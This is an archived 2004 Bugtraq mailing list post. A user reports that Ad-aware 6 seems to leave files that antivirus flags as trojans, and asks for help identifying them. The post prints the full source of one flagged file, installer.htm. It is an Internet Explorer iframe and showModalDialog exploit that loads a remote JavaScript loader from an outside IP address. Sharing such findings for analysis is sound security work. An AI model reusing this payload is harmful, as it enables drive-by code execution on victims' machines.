[35417] in bugtraq
Unusual Activity in Ad-aware 6 Personal, Build 6.181
daemon@ATHENA.MIT.EDU (fedhead)
Tue Jun 22 01:36:12 2004
From: "fedhead" <fedhead@rogers.com>
To: "bugtraq" <bugtraq@securityfocus.com>
Date: Sun, 20 Jun 2004 10:36:16 -0400
Message-ID: <LIEKJLEBDKKNBDDGIJAAAEBECFAA.fedhead@rogers.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Sorry about my previous post, Norton picked up the html code an filtered my
e-mail. Here is the original post without the html flags
Hello,
My apologise if I am posting in the wrong list but I am not sure if this is
a known issue in Ad-aware or if this even is an issue with Ad-aware.
I have written a script to run ad-aware to scan the registry and files from
Windows XP Scheduled tasks:
rem Scan the local registry
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" +c +1 +A
rem Scan the file system:
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" C:\ +a +1 +A
Seems benign enough. Every night when it runs, after the first scan of the
registry, it creates four files in the C:\Program Files\Lavasoft\Ad-Aware
6\cache folder which Norton AV catches as trojan scripts:
exploit.chm
installer.htm
shellscript.js
shellscript_loader.js
In installer.htm, it appears to use one of the IE IFRAME exploits to
download the java script files.
cat installer.htm
<script language="Javascript">
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://62.131.86.111/security/idiots/repro/shellscript_loader.js\\'><
\/script>'";
}
</script>
<script language="javascript">
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp"
WIDTH=200 HEIGHT=200></IFRAME>');
</script>
The most unusual part is that it happens at the end of the registry scan in
Ad-aware. A google search doesn't turn up any relation between this exploit
and Ad-aware so it could be something unique to my system but at this point
I am at a loss as to what it could be.
I also have an 'image' of my Windows XP Pro install in a VMware where I have
been testing SP2 and the files also exist there as well.
Any info would be appreciated.
Thanks,
Matt
